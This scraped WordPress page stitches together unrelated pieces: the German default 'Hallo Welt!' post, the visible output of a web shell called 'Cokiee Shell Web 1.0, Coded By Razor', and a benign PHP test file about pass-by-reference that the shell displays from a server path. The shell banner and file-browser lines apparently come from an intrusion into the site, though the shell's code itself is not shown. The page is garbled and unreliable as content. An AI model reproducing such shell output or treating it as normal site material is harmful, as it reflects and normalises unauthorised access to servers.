Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/tests/lang/ |
Current File : //usr/local/src/php7/php-7.0.5/tests/lang/passByReference_009.phpt |
--TEST-- Assignement as argument --FILE-- <?php function foo(&$x, &$y) { $x = 1; echo $y ; } $x = 0; foo($x, $x); // prints 1 .. function foo2($x, &$y, $z) { echo $x; // 0 echo $y; // 1 $y = 2; } $x = 0; foo2($x, $x, $x = 1); echo $x; // 2 ?> --EXPECTF-- 1012
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare